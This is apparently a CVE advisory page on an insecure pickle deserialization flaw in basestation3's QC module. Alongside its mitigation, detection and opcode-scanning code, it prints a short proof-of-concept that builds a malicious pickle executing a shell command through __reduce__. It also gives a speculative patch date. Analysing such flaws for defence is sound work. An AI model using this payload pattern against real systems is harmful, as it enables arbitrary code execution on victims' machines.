iop-apl-uw basestation3, Insecure Deserialization, CVE-2025-4905 (Medium)

How CVE-2025-4905 Works

The vulnerability is in the `load_qc_pickl` function in basestation3/QC.py, which performs unsafe deserialization of the file passed in its `qc_file` argument. Attackers can craft malicious pickle files to execute arbitrary code during deserialization. Exploitation requires local access, so an attacker must first obtain user privileges on the system; the CVSS 4.0 vector (AV:L/AC:L/PR:L) reflects this. Despite being marked as closed, no patches or GitHub commits address the issue as of June 2025.

DailyCVE Form

Platform: iop-apl-uw basestation3
Version: <= 3.0.4
Vulnerability: Insecure deserialization
Severity: Medium
Date: 2025-06-12

Prediction: Patch expected 2025-08-30

What Undercode Say:

Analytics:

  • Exploitability Index: 2.8 (Local privilege escalation likely)
  • Affected Components: `QC.py` (QC module)
  • Attack Surface: Limited to authenticated users

Exploit Commands:

```python
import pickle

class Exploit:
    def __reduce__(self):
        return (exec, ('import os; os.system("id")',))

payload = pickle.dumps(Exploit())
with open("malicious_qc.pkl", "wb") as f:
    f.write(payload)
```

Mitigation Commands:

1. Disable pickle deserialization:

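```python
# Replace load_qc_pickl with a safe JSON loader.
# Existing .pkl files cannot be read this way; the QC data must be stored as JSON.
import json

def load_qc_safe(qc_file):
    with open(qc_file, "r") as f:
        return json.load(f)
```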

2. Apply strict file permissions:

```sh
chmod 600 /path/to/qc_files/*.pkl
```

Detection Script:

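```python
import ast

def audit_pickle(file_path):
    # Flags any file that does not parse as a plain Python literal.
    # Binary pickle streams fail to decode (UnicodeDecodeError is a
    # ValueError subclass), so they are reported as well.
    with open(file_path, "rb") as f:
        try:
            ast.literal_eval(f.read().decode())
        except (SyntaxError, ValueError):
            print(f"Warning: {file_path} may contain pickle payloads")
```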
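A more precise audit for QC pickle files, as an added example that is not code from this page or from the basestation3 project: it walks the opcode stream with the standard library's `pickletools.genops`, which never executes the pickle, and reports every import and call the file would trigger on load. The names `scan_pickle` and `imports_within_allowlist` and both sample pickles are constructed for illustration; resolution of `STACK_GLOBAL` targets is a heuristic that reports `<unresolved>` when unsure.

```python
import collections
import pickle
import pickletools

# Opcodes that import a callable, or call one, while a stream is being loaded.
IMPORT_OPS = {"GLOBAL", "STACK_GLOBAL", "INST", "EXT1", "EXT2", "EXT4"}
CALL_OPS = {"REDUCE", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX", "BUILD"}
MEMO_GET = {"GET", "BINGET", "LONG_BINGET"}
MEMO_PUT = {"PUT", "BINPUT", "LONG_BINPUT"}

def scan_pickle(data):
    """Walk the opcode stream without loading it; return (imports, calls)."""
    imports, calls, memo = [], [], {}
    prev = top = None  # the two most recently pushed values, when they are strings
    for op, arg, _pos in pickletools.genops(data):
        name = op.name
        if name in CALL_OPS:
            calls.append(name)
        if name in ("GLOBAL", "INST"):
            imports.append(arg.replace(" ", ".", 1))  # arg is "module name"
        elif name == "STACK_GLOBAL":  # module and name were pushed as strings
            known = isinstance(prev, str) and isinstance(top, str)
            imports.append(f"{prev}.{top}" if known else "<unresolved>")
        elif name in IMPORT_OPS:  # copyreg extension code, resolved at load time
            imports.append(f"<ext:{arg}>")
        if name == "MEMOIZE":
            memo[len(memo)] = top
        elif name in MEMO_PUT:
            memo[arg] = top
        elif name in MEMO_GET:
            prev, top = top, memo.get(arg)
        else:
            is_str = isinstance(arg, str) and name not in IMPORT_OPS
            prev, top = top, (arg if is_str else None)
    return imports, calls

def imports_within_allowlist(data, allowed=frozenset()):
    """True only if the stream parses and every import is on the allowlist."""
    try:
        imports, _calls = scan_pickle(data)
    except Exception:  # truncated or malformed stream: fail closed
        return False
    return all(name in allowed for name in imports)

# Constructed samples: a data-only pickle and one that needs a (benign) callable.
PLAIN = pickle.dumps({"depth_qc": [0, 0, 3], "source": "constructed"})
WITH_CALLABLE = pickle.dumps(collections.OrderedDict(depth_qc=1))

if __name__ == "__main__":
    for label, blob in (("plain", PLAIN), ("with_callable", WITH_CALLABLE)):
        print(label, scan_pickle(blob), imports_within_allowlist(blob))
```

With the default empty allowlist, only pickles made of plain data types pass; any file that imports a callable is held back for review before it reaches a loader.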

References:

  • CPE: `cpe:2.3:a:iop-apl-uw:basestation3:*:*:*:*:*:*:*:*` (up to 3.0.4)
  • CVSS:4.0/AV:L/AC:L/PR:L/UI:N/VC:L/VI:L/VA:L

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
